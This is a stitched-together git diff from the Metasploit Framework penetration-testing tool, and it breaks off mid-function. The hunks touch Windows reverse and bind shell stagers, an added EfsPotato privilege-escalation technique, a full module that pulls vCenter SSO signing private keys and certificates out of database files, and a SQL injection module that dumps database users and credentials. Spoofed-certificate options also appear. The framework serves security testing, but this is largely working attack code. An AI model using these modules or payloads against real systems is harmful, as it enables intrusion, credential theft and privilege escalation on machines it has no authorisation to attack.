+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -16,7 +16,7 @@ module Payload::Windows::BindTcpRc4_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -19,7 +19,7 @@ module Payload::Windows::BindTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:     datastore['LPORT'],
      reliable: false
@@ -25,7 +25,7 @@ module Payload::Windows::ReverseNamedPipe_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      name:        datastore['PIPENAME'],
      host:        datastore['PIPEHOST'],
@@ -16,7 +16,7 @@ module Payload::Windows::ReverseTcpRc4_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    xorkey, rc4key = rc4_keys(datastore['RC4PASSWORD'])
    conf = {
      port:        datastore['LPORT'],
@@ -26,7 +26,7 @@ module Payload::Windows::ReverseTcp_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})
    conf = {
      port:        datastore['LPORT'],
      host:        datastore['LHOST'],
@@ -28,7 +28,7 @@ module Payload::Windows::ReverseWinHttps_x64
  #
  # Generate the first stage
  #
-  def generate
+  def generate(_opts = {})

    verify_cert_hash = get_ssl_cert_hash(datastore['StagerVerifySSLCert'],
                                         datastore['HandlerSSLCert'])
@@ -294,6 +294,7 @@ module Services
  # Mode is a string with either auto, manual or disable for the
  # corresponding setting. The name of the service is case sensitive.
  #
+  # @raise [RuntimeError] if an invalid startup mode is provided in the mode parameter
  #
  def service_change_startup(name, mode, server=nil)
    if mode.is_a? Integer
@@ -338,6 +339,8 @@ module Services
  #
  # @return [GetLastError] 0 if the function succeeds
  #
+  # @raise [RuntimeError] if OpenSCManagerA failed
+  #
  def service_change_config(name, opts, server=nil)
    open_sc_manager(:host=>server, :access=>"SC_MANAGER_CONNECT") do |manager|
      open_service_handle(manager, name, "SERVICE_CHANGE_CONFIG") do |service_handle|
@@ -369,6 +372,8 @@ module Services
  #
  # @return [GetLastError] 0 if the function succeeds
  #
+  # @raise [RuntimeError] if OpenSCManagerA failed
+  #
  def service_create(name, opts, server=nil)
    access = "SC_MANAGER_CONNECT | SC_MANAGER_CREATE_SERVICE | SC_MANAGER_QUERY_LOCK_STATUS"
    open_sc_manager(:host=>server, :access=>access) do |manager|
@@ -465,6 +470,8 @@ module Services
  #
  # @param (see #service_start)
  #
+  # @raise [RuntimeError] if OpenServiceA failed
+  #
  def service_delete(name, server=nil)
    open_sc_manager(:host=>server) do |manager|
      open_service_handle(manager, name, "DELETE") do |service_handle|
@@ -483,7 +490,6 @@ module Services
  #
  # @raise (see #service_start)
  #
-  #
  def service_status(name, server=nil)
    ret = nil

@@ -513,53 +519,41 @@ module Services
  #
  # @return [Boolean] indicating success
  #
-  #
-  def service_restart(name, start_type=START_TYPE_AUTO, server=nil)
-    tried = false
+  def service_restart(name, start_type=START_TYPE_AUTO, server=nil, should_retry=true)
+    status = service_start(name, server)

-    begin
-      status = service_start(name, server)
+    if status == Error::SUCCESS
+      vprint_good("[#{name}] Service started")
+      return true
+    end

-      if status == Error::SUCCESS
-        vprint_good("[#{name}] Service started")
-        return true
-      else
-        raise status
-      end
-    rescue RuntimeError => s
-      if tried
-        vprint_error("[#{name}] Unhandled error: #{s}")
-        return false
-      else
-        tried = true
-      end

-      case s.message.to_i
-      when Error::ACCESS_DENIED
-        vprint_error("[#{name}] Access denied")
-      when Error::INVALID_HANDLE
-        vprint_error("[#{name}] Invalid handle")
-      when Error::PATH_NOT_FOUND
-        vprint_error("[#{name}] Service binary could not be found")
-      when Error::SERVICE_ALREADY_RUNNING
-        vprint_status("[#{name}] Service already running attempting to stop and restart")
-        stopped = service_stop(name, server)
-        if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
-          retry
-        else
-          vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
-        end
-      when Error::SERVICE_DISABLED
-        vprint_status("[#{name}] Service disabled attempting to set to manual")
-        if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
-          retry
-        else
-          vprint_error("[#{name}] Service disabled, unable to change start type")
-        end
+    case status
+    when Error::ACCESS_DENIED
+      vprint_error("[#{name}] Access denied")
+    when Error::INVALID_HANDLE
+      vprint_error("[#{name}] Invalid handle")
+    when Error::PATH_NOT_FOUND
+      vprint_error("[#{name}] Service binary could not be found")
+    when Error::SERVICE_ALREADY_RUNNING
+      vprint_status("[#{name}] Service already running attempting to stop and restart")
+      stopped = service_stop(name, server)
+      if ((stopped == Error::SUCCESS) || (stopped == Error::SERVICE_NOT_ACTIVE))
+        service_restart(name, start_type, server, false) if should_retry
      else
-        vprint_error("[#{name}] Unhandled error: #{s}")
-        return false
+        vprint_error("[#{name}] Service disabled, unable to change start type Error: #{stopped}")
      end
+    when Error::SERVICE_DISABLED
+      vprint_status("[#{name}] Service disabled attempting to set to manual")
+      if (service_change_config(name, {:starttype => start_type}, server) == Error::SUCCESS)
+        service_restart(name, start_type, server, false) if should_retry
+      else
+        vprint_error("[#{name}] Service disabled, unable to change start type")
+      end
+    else
+      status = WindowsError::Win32.find_by_retval(s).first
+      vprint_error("[#{name}] Unhandled error: #{status.name}: #{status.description}")
+      return false
    end
  end

@@ -30,7 +30,8 @@ class Priv < Extension
    named_pipe_2: 2,
    token_dup: 3,
    named_pipe_rpcss: 4,
-    named_pipe_print_spooler: 5
+    named_pipe_print_spooler: 5,
+    named_pipe_efs: 6
  }.freeze

  #
@@ -85,6 +85,7 @@ class Pivot
    c = Class.new(::Msf::Payload)
    c.include(::Msf::Payload::Stager)
    c.include(::Msf::Payload::TransportConfig)
+    c.include(::Msf::Sessions::MeterpreterOptions)

    # TODO: add more platforms
    case opts[:platform]
@@ -110,6 +110,7 @@ class Console
      self.client.kill
    rescue  ::Exception => e
      log_error("Error running command #{method}: #{e.class} #{e}")
+      elog(e)
    end
  end

@@ -1337,13 +1337,14 @@ class Console::CommandDispatcher::Core
        if (client.core.use(modulenameprovided) == true)
          add_extension_client(md)

-          if md == 'stdapi' && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo']
+          if md == 'stdapi' && (client.exploit_datastore && !client.exploit_datastore['AutoLoadStdapi'] && client.exploit_datastore['AutoSystemInfo'])
            client.load_session_info
          end
        end
      rescue => ex
        print_line
        log_error("Failed to load extension: #{ex.message}")
+        elog(ex)
        if ex.kind_of?(ExtensionLoadError) && ex.name
          # MetasploitPayloads and MetasploitPayloads::Mettle do things completely differently, build an array of
          # suggestion keys (binary_suffixes and Mettle build-tuples)
@@ -24,6 +24,7 @@ class Console::CommandDispatcher::Priv::Elevate
  ELEVATE_TECHNIQUE_SERVICE_TOKENDUP        = 3
  ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS = 4
  ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER  = 5
+  ELEVATE_TECHNIQUE_NAMEDPIPE_EFS           = 6

  ELEVATE_TECHNIQUE_DESCRIPTION =
    [
@@ -32,7 +33,8 @@ class Console::CommandDispatcher::Priv::Elevate
      'Named Pipe Impersonation (Dropper/Admin)',
      'Token Duplication (In Memory/Admin)',
      'Named Pipe Impersonation (RPCSS variant)',
-      'Named Pipe Impersonation (PrintSpooler variant)'
+      'Named Pipe Impersonation (PrintSpooler variant)',
+      'Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)'
    ]

  #
@@ -4,6 +4,22 @@ require 'rex/socket'
 # Monkeypatch upstream library, for now
 # TODO: write a real LDAP client in Rex and migrate all consumers
 class Net::LDAP::Connection # :nodoc:
+  module SynchronousRead
+    def read(length = nil, opts = {})
+      data = ''
+      loop do
+        chunk = super(length - data.length)
+        if chunk.nil?
+          return data == '' ? nil : data
+        end
+
+        data << chunk
+        break if data.length == length
+      end
+
+      data
+    end
+  end

  def initialize(server)
    begin
@@ -12,6 +28,7 @@ class Net::LDAP::Connection # :nodoc:
        'PeerPort' => server[:port],
        'Proxies' => server[:proxies]
      )
+      @conn.extend(SynchronousRead)
    rescue SocketError
      raise Net::LDAP::LdapError, 'No such address or other socket error.'
    rescue Errno::ECONNREFUSED
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
  # are needed when there's no database
  spec.add_runtime_dependency 'metasploit-model'
  # Needed for Meterpreter
-  spec.add_runtime_dependency 'metasploit-payloads', '2.0.87'
+  spec.add_runtime_dependency 'metasploit-payloads', '2.0.94'
  # Needed for the next-generation POSIX Meterpreter
  spec.add_runtime_dependency 'metasploit_payloads-mettle', '1.0.18'
  # Needed by msfgui and other rpc components
@@ -224,6 +224,7 @@ Gem::Specification.new do |spec|
  spec.add_runtime_dependency 'eventmachine'

  spec.add_runtime_dependency 'faraday'
+  spec.add_runtime_dependency 'faraday-retry'

  # Required for windows terminal colors as of Ruby 3.0
  spec.add_runtime_dependency 'win32api'
@@ -31,13 +31,13 @@ class MetasploitModule < Msf::Auxiliary
        'Targets' => [['WordPress', {}]],
        'DefaultTarget' => 0,
        'References' => [
-          ['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/'],
-          ['NOCVE', 'Patched in 3.53.3 without vendor disclosure']
+          ['URL', 'https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/']
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
-          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS],
+          'NOCVE' => ['Patched in 3.53.3 without vendor disclosure']
        }
      )
    )
@@ -35,7 +35,9 @@ class MetasploitModule < Msf::Auxiliary
        ],
      'Notes'           =>
        {
-          'SideEffects' =>  [CONFIG_CHANGES]
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => [CONFIG_CHANGES]
        },
      'DisclosureDate'  => '2018-11-08'
    ))
@@ -0,0 +1,209 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'metasploit/framework/credential_collection'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMware vCenter Extract Secrets from vmdir / vmafd DB File',
+        'Description' => %q{
+          Grab certificates from the vCenter server vmdird and vmafd
+          database files and adds them to loot. The vmdird MDB database file
+          can be found on the live appliance under the path
+          /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path
+          /storage/db/vmware-vmafd/afd.db. The vmdir database contains the
+          IdP signing credential, and vmafd contains the vCenter certificate
+          store. This module will accept either file from a live vCenter
+          appliance, or from a vCenter appliance backup archive; either or
+          both files can be supplied.
+        },
+        'Author' => 'npm[at]cesium137.io',
+        'Platform' => [ 'linux' ],
+        'DisclosureDate' => '2022-05-10',
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['URL', 'https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/']
+        ],
+        'Actions' => [
+          [
+            'Dump',
+            {
+              'Description' => 'Dump secrets from vCenter files'
+            }
+          ]
+        ],
+        'DefaultAction' => 'Dump',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+
+    register_options([
+      OptPath.new('VMDIR_MDB', [ false, 'Path to the vmdir data.mdb file' ]),
+      OptPath.new('VMAFD_DB', [ false, 'Path to the vmafd afd.db file' ]),
+      OptString.new('VC_IP', [ false, '(Optional) IPv4 address to attach to loot' ])
+    ])
+
+    register_advanced_options([
+      OptInt.new('MDB_CHUNK_SIZE', [ true, 'Block size to use when scanning MDB file', 4096 ]),
+      OptInt.new('MDB_STARTING_OFFSET', [ true, 'Starting offset for MDB file binary scan', 0 ])
+    ])
+  end
+
+  def loot_host
+    datastore['VC_IP'] || '127.0.0.1'
+  end
+
+  def vmdir_file
+    datastore['VMDIR_MDB']
+  end
+
+  def vmafd_file
+    datastore['VMAFD_DB']
+  end
+
+  def run
+    unless vmdir_file || vmafd_file
+      print_error('Please specify the path to at least one vCenter database file (VMDIR_MDB or VMAFD_DB)')
+      return
+    end
+    if vmdir_file
+      print_status("Extracting vmwSTSTenantCredential from #{vmdir_file} ...")
+      extract_idp_cert
+    end
+    if vmafd_file
+      print_status("Extracting vSphere platform certificates from #{vmafd_file} ...")
+      extract_vmafd_certs
+    end
+  end
+
+  def extract_vmafd_certs
+    db = SQLite3::Database.open(vmafd_file)
+    db.results_as_hash = true
+    unless (vecs_entry_alias = db.execute('SELECT DISTINCT Alias FROM CertTable WHERE PrivateKey NOT NULL;'))
+      fail_with(Msf::Exploit::Failure::NoTarget, 'Empty Alias list returned from CertTable')
+    end
+    vecs_entry_alias.each do |vecs_alias|
+      store_label = vecs_alias['Alias'].upcase
+      unless (res = db.execute("SELECT PrivateKey, CertBlob FROM CertTable WHERE Alias = '#{store_label}';").first)
+        fail_with(Msf::Exploit::Failure::NoTarget, "Could not extract CertTable Alias '#{store_label}'")
+      end
+      priv_pem = res['PrivateKey'].encode('utf-8').delete("\000")
+      pub_pem = res['CertBlob'].encode('utf-8').delete("\000")
+      begin
+        key = OpenSSL::PKey::RSA.new(priv_pem)
+        cert = OpenSSL::X509::Certificate.new(pub_pem)
+        p = store_loot(store_label, 'PEM', loot_host, key.to_pem.to_s, "#{store_label}.key", "vCenter #{store_label} Private Key")
+        print_good("#{store_label} key: #{p}")
+        p = store_loot(store_label, 'PEM', loot_host, cert.to_pem.to_s, "#{store_label}.pem", "vCenter #{store_label} Certificate")
+        print_good("#{store_label} cert: #{p}")
+      rescue OpenSSL::PKey::PKeyError
+        print_error("Could not extract #{store_label} private key")
+      rescue OpenSSL::X509::CertificateError
+        print_error("Could not extract #{store_label} certificate")
+      end
+    end
+  rescue SQLite3::NotADatabaseException => e
+    fail_with(Msf::Exploit::Failure::NoTarget, "Error opening SQLite3 database '#{vmafd_file}': #{e.message}")
+  rescue SQLite3::SQLException => e
+    fail_with(Msf::Exploit::Failure::NoTarget, "Error calling SQLite3: #{e.message}")
+  end
+
+  def extract_idp_cert
+    sts_pem = nil
+    unless (bytes = read_mdb_sts_block(vmdir_file, datastore['MDB_CHUNK_SIZE'], datastore['MDB_STARTING_OFFSET']))
+      fail_with(Msf::Exploit::Failure::NoTarget, "Invalid vmdird database '#{vmdir_file}': unable to locate TenantCredential-1 in binary stream")
+    end
+    idp_key = get_sts_key(bytes)
+    idp_key_pem = idp_key.to_pem.to_s
+    get_sts_pem(bytes).each do |stscert|
+      idp_cert_pem = stscert.to_pem.to_s
+      case stscert.check_private_key(idp_key)
+      when true # Private key associates with public cert
+        sts_pem = "#{idp_key_pem}#{idp_cert_pem}"
+        p = store_loot('idp', 'PEM', loot_host, idp_key_pem, 'SSO_STS_IDP.key', 'vCenter SSO IdP private key')
+        print_good("SSO_STS_IDP key: #{p}")
+        p = store_loot('idp', 'PEM', loot_host, idp_cert_pem, 'SSO_STS_IDP.pem', 'vCenter SSO IdP certificate')
+        print_good("SSO_STS_IDP cert: #{p}")
+      when false # Private key does not associate with this cert (VMCA root)
+        p = store_loot('vmca', 'PEM', loot_host, idp_cert_pem, 'VMCA_ROOT.pem', 'vCenter VMCA root certificate')
+        print_good("VMCA_ROOT cert: #{p}")
+      end
+    end
+    unless sts_pem # We were unable to link a public and private key together
+      fail_with(Msf::Exploit::Failure::NoTarget, 'Unable to associate IdP certificate and private key')
+    end
+  end
+
+  def read_mdb_sts_block(file_name, chunk_size, offset)
+    bytes = nil
+    file = File.open(file_name, 'rb')
+    while offset <= file.size - chunk_size
+      buf = File.binread(file, chunk_size, offset + 1)
+      if buf.match?(/cn=tenantcredential-1/i) && buf.match?(/[\x30\x82](.{2})[\x30\x82]/n) && buf.match?(/[\x30\x82](.{2})[\x02\x01\x00]/n)
+        target_offset = offset + buf.index(/cn=tenantcredential-1/i) + 1
+        bytes = File.binread(file, chunk_size * 2, target_offset)
+        break
+      end
+      offset += chunk_size
+    end
+    bytes
+  rescue StandardError => e
+    fail_with(Msf::Exploit::Failure::Unknown, "Exception in #{__method__}: #{e.message}")
+  ensure
+    file.close
+  end
+
+  def read_der(bytes)
+    der_len = (bytes[2..3].unpack('H*').first.to_i(16) + 4).to_i
+    unless der_len <= bytes.length - 1
+      fail_with(Msf::Exploit::Failure::Unknown, 'Malformed DER: byte length exceeds working buffer size')
+    end
+    bytes[0..der_len - 1]
+  end
+
+  def get_sts_key(bytes)
+    working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}020100/) / 2 # PKCS1 magic bytes
+    byte_len = bytes.length - working_offset
+    key_bytes = read_der(bytes[working_offset, byte_len])
+    key_b64 = Base64.strict_encode64(key_bytes).scan(/.{1,64}/).join("\n")
+    key_pem = "-----BEGIN PRIVATE KEY-----\n#{key_b64}\n-----END PRIVATE KEY-----"
+    vprint_status("key_pem:\n#{key_pem}")
+    OpenSSL::PKey::RSA.new(key_pem)
+  rescue OpenSSL::PKey::PKeyError
+    # fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of PKCS#1 RSA private key')
+    print_error('Failure during extract of PKCS#1 RSA private key')
+  end
+
+  def get_sts_pem(bytes)
+    idp_certs = []
+    working_offset = bytes.unpack('H*').first.index(/3082[0-9a-f]{4}3082/) / 2 # x509v3 magic bytes
+    byte_len = bytes.length - working_offset
+    working_bytes = bytes[working_offset, byte_len]
+    [4, 8].each do |offset|
+      der_bytes = read_der(working_bytes)
+      der_b64 = Base64.strict_encode64(der_bytes).scan(/.{1,64}/).join("\n")
+      der_pem = "-----BEGIN CERTIFICATE-----\n#{der_b64}\n-----END CERTIFICATE-----"
+      vprint_status("der_pem:\n#{der_pem}")
+      idp_certs << OpenSSL::X509::Certificate.new(der_pem)
+      next_offset = working_offset + der_bytes.length + offset - 1
+      working_offset = next_offset
+      byte_len = bytes.length - working_offset
+      working_bytes = bytes[working_offset, byte_len]
+    end
+    idp_certs
+  rescue OpenSSL::X509::CertificateError
+    # fail_with(Msf::Exploit::Failure::NoTarget, 'Failure during extract of x509v3 certificate')
+    print_error('Failure during extract of x509v3 certificate')
+  end
+end
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
+  include Msf::Exploit::SQLi

  def initialize(info = {})
    super(
@@ -75,13 +76,8 @@ class MetasploitModule < Msf::Auxiliary
    Rex::Text.rand_text_alpha(len)
  end

-  def char_list(string)
-    ('char(' + string.split('').map(&:ord).join(')+char(') + ')').to_s
-  end
-
  def error_info(body)
-    /BQEShowModalAlert\('Information','(?<error>[^']+)/ =~ body
-    error
+    body[/BQEShowModalAlert\('Information','([^']+)/, 1]
  end

  def inject(content, state, generator, validation)
@@ -127,9 +123,6 @@ class MetasploitModule < Msf::Auxiliary

    header = rand_chars
    footer = rand_chars
-    header_char = char_list(header)
-    footer_char = char_list(footer)
-    int = Rex::Text.rand_text_numeric(4)

    service = {
      address: rhost,
@@ -140,24 +133,25 @@ class MetasploitModule < Msf::Auxiliary
    }
    report_service(service)

-    # all inject strings taken from sqlmap runs, using error page method
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND CHARINDEX(CHAR(49)+CHAR(53)+CHAR(46)+CHAR(48)+CHAR(46),@@VERSION)>0)+'", viewstate, viewstategenerator, eventvalidation)
-    /, table \\u0027(?<table>.+?)\\u0027/ =~ error_info(res)
-    print_good("Current Database: #{table.split('.').first}")
-    report_note(host: rhost, port: rport, type: 'database', data: table.split('.').first)
+    sqli = create_sqli(dbms: Msf::Exploit::SQLi::Mssqli::Common, opts: { safe: true, encoder: { encode: "'#{header}'+^DATA^+'#{footer}'", decode: ->(x) { x[/#{header}(.+?)#{footer}/mi, 1] } } }) do |payload|
+      int = Rex::Text.rand_text_numeric(4)
+      res = inject("'+(select '' where #{int} in (#{payload}))+'", viewstate, viewstategenerator, eventvalidation)
+      err_info = error_info(res)
+      print_error('Unexpected output from the server') if err_info.nil?
+      err_info[/\\u0027(.+?)\\u0027/m, 1]
+    end

-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 1325 IN (SELECT (#{header_char}+(SELECT SUBSTRING((ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<banner>.+?)\\u0027/ =~ error_info(res)
-    banner.slice!(header)
-    banner.slice!(footer)
-    banner = banner.gsub('\n', "\n").gsub('\t', "\t")
+    # all inject strings taken from sqlmap runs, using error page method
+    database = sqli.current_database
+    print_good("Current Database: #{database}")
+    report_note(host: rhost, port: rport, type: 'database', data: database)
+
+    banner = sqli.version.gsub('\n', "\n").gsub('\t', "\t")
    print_good("Banner: #{banner}")

-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 8603 IN (SELECT (#{header_char}+(SELECT SUBSTRING((ISNULL(CAST(SYSTEM_USER AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<user>.+?)\\u0027/ =~ error_info(res)
-    user.slice!(header)
-    user.slice!(footer)
+    user = sqli.current_user
    print_good("DB User: #{user}")
+
    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
@@ -167,25 +161,15 @@ class MetasploitModule < Msf::Auxiliary
    }.merge(service)
    create_credential(credential_data)

-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7555 IN (SELECT (#{header_char}+(SUBSTRING((ISNULL(CAST(@@SERVERNAME AS NVARCHAR(4000)),CHAR(32))),1,1024))+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<hostname>.+?)\\u0027/ =~ error_info(res)
-    hostname.slice!(header)
-    hostname.slice!(footer)
+    hostname = sqli.hostname
    print_good("Hostname: #{hostname}")

-    report_host(host: rhost, name: hostname, info: banner.gsub('\n', "\n").gsub('\n', "\n"), os_name: OperatingSystems::WINDOWS)
+    report_host(host: rhost, name: hostname, info: banner, os_name: OperatingSystems::WINDOWS)

-    sec_table = "#{table.split('.')[0...-1].join('.')}.SecurityTable"
-
-    # get user count from SecurityTable
-    res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 8815 IN (SELECT (#{header_char}+(SELECT ISNULL(CAST(COUNT(*) AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-    /\\u0027(?<user_count>.+?)\\u0027/ =~ error_info(res)
-    user_count.slice!(header)
-    user_count.slice!(footer)
-    print_good("User Count in #{sec_table}: #{user_count}")
+    sec_table = sqli.dump_table_fields("#{database}.dbo.SecurityTable", %w[EmployeeID Settings], 'ModuleID=0')

    table = Rex::Text::Table.new(
-      'Header' => sec_table,
+      'Header' => "#{database}.dbo.SecurityTable",
      'Indent' => 1,
      'SortIndex' => -1,
      'Columns' =>
@@ -195,22 +179,7 @@ class MetasploitModule < Msf::Auxiliary
      ]
    )

-    (1..user_count.to_i).each do |index|
-      # username
-      # select EmployeeID from test.dbo.SecurityTable where ModuleID=0
-      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 2292 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-      /\\u0027(?<username>.+?)\\u0027/ =~ error_info(res)
-      username.slice!(header)
-      username.slice!(footer)
-      print_good("Username: #{username}")
-
-      # settings
-      # select Settings from test.dbo.SecurityTable where ModuleID=0
-      res = inject("'+(SELECT #{char_list(rand_chars)} WHERE #{int}=#{int} AND 7411 IN (SELECT (#{header_char}+(SELECT TOP 1 SUBSTRING((ISNULL(CAST(Settings AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM #{sec_table} WHERE ModuleID=0 AND ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP #{index - 1} ISNULL(CAST(EmployeeID AS NVARCHAR(4000)),CHAR(32)) FROM #{sec_table} WHERE ModuleID=0 ORDER BY EmployeeID) ORDER BY EmployeeID)+#{footer_char})))+'", viewstate, viewstategenerator, eventvalidation)
-      /\\u0027(?<settings>.+?)\\u0027/ =~ error_info(res)
-      settings.slice!(header)
-      settings.slice!(footer)
-      print_good("User #{username} settings: #{settings}")
+    sec_table.each do |(username, settings)|
      table << [username, settings]
      credential_data = {
        origin_type: :service,
@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Auxiliary
        OptPath.new('PRIVKEY', [false, 'Sign the cert with your own CA private key', nil]),
        OptString.new('PRIVKEY_PASSWORD', [false, 'Password for private key specified in PRIV_KEY (if applicable)', nil]),
        OptPath.new('CA_CERT', [false, 'CA Public certificate', nil]),
-        OptString.new('ADD_CN', [false, 'Add CN to match spoofed site name (e.g. *.example.com)', nil])
+        OptString.new('ADD_CN', [false, 'Add CN to match spoofed site name (e.g. *.example.com)', nil]),
+        OptString.new('ADD_SAN', [false, 'Add SAN entries to certificate (e.g. alt.example.com,127.0.0.1)', nil])
      ]
    )

@@ -180,6 +181,17 @@ class MetasploitModule < Msf::Auxiliary
      ef.create_extension('subjectKeyIdentifier', 'hash'),
    ]

+    # Add additional SAN entries to the new cert. See https://support.f5.com/csp/article/K13471
+    # for an example of how this added SAN field is expected to look like in a certificate.
+    if !datastore['ADD_SAN'].nil? && !datastore['ADD_SAN'].empty?
+      sans = datastore['ADD_SAN'].to_s.split(/,/)
+      sans.map! do |san|
+        san = (san =~ Resolv::IPv4::Regex || san =~ Resolv::IPv6::Regex) ? "IP:#{san}" : "DNS:#{san}"
+      end
+      new_cert.add_extension(ef.create_extension('subjectAltName', sans.join(','), false))
+      print_status("Adding #{datastore['ADD_SAN']} to the certificate subject alternative names")
+    end
+
    if !datastore['PRIVKEY'].nil? && !datastore['PRIVKEY'].empty?
      new_cert.sign(ca_key, OpenSSL::Digest.new(hashtype))
      new_key = ca_key # Set for file output
@@ -7,19 +7,19 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SunRPC
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Nfs

  def initialize
    super(
-      'Name'          => 'NFS Mount Scanner',
-      'Description'   => %q{
+      'Name' => 'NFS Mount Scanner',
+      'Description' => %q{
        This module scans NFS mounts and their permissions.
      },
-      'Author'	       => ['<tebo[at]attackresearch.com>'],
-      'References'     =>
-        [
-          ['CVE', '1999-0170'],
-          ['URL',	'https://www.ietf.org/rfc/rfc1094.txt']
-        ],
+      'Author'	=> ['<tebo[at]attackresearch.com>'],
+      'References' => [
+        ['CVE', '1999-0170'],
+        ['URL', 'https://www.ietf.org/rfc/rfc1094.txt']
+      ],
      'License'	=> MSF_LICENSE
    )

@@ -27,57 +27,62 @@ class MetasploitModule < Msf::Auxiliary
      OptEnum.new('PROTOCOL', [ true, 'The protocol to use', 'udp', ['udp', 'tcp']])
    ])

+    register_advanced_options(
+      [
+        OptBool.new('Mountable', [false, 'Determine if an export is mountable', true]),
+      ]
+    )
  end

  def run_host(ip)
+    program	= 100005
+    progver	= 1
+    procedure	= 5

-    begin
-      program		= 100005
-      progver		= 1
-      procedure	= 5
+    sunrpc_create(datastore['PROTOCOL'], program, progver)
+    sunrpc_authnull
+    resp = sunrpc_call(procedure, '')

-      sunrpc_create(datastore['PROTOCOL'], program, progver)
-      sunrpc_authnull()
-      resp = sunrpc_call(procedure, "")
+    # XXX: Assume that transport is udp and port is 2049
+    # Technically we are talking to mountd not nfsd

-      # XXX: Assume that transport is udp and port is 2049
-      # Technically we are talking to mountd not nfsd
+    report_service(
+      host: ip,
+      proto: datastore['PROTOCOL'],
+      port: 2049,
+      name: 'nfsd',
+      info: "NFS Daemon #{program} v#{progver}"
+    )

-      report_service(
-        :host  => ip,
-        :proto => datastore['PROTOCOL'],
-        :port  => 2049,
-        :name  => 'nfsd',
-        :info  => "NFS Daemon #{program} v#{progver}"
-      )
+    exports = resp[3, 1].unpack('C')[0]
+    if (exports == 0x01)
+      shares = []
+      while Rex::Encoder::XDR.decode_int!(resp) == 1
+        dir = Rex::Encoder::XDR.decode_string!(resp)
+        grp = []
+        grp << Rex::Encoder::XDR.decode_string!(resp) while Rex::Encoder::XDR.decode_int!(resp) == 1

-      exports = resp[3,1].unpack('C')[0]
-      if (exports == 0x01)
-        shares = []
-        while Rex::Encoder::XDR.decode_int!(resp) == 1 do
-          dir = Rex::Encoder::XDR.decode_string!(resp)
-          grp = []
-          while Rex::Encoder::XDR.decode_int!(resp) == 1 do
-            grp << Rex::Encoder::XDR.decode_string!(resp)
-          end
-          print_good("#{ip} NFS Export: #{dir} [#{grp.join(", ")}]")
-          shares << [dir, grp]
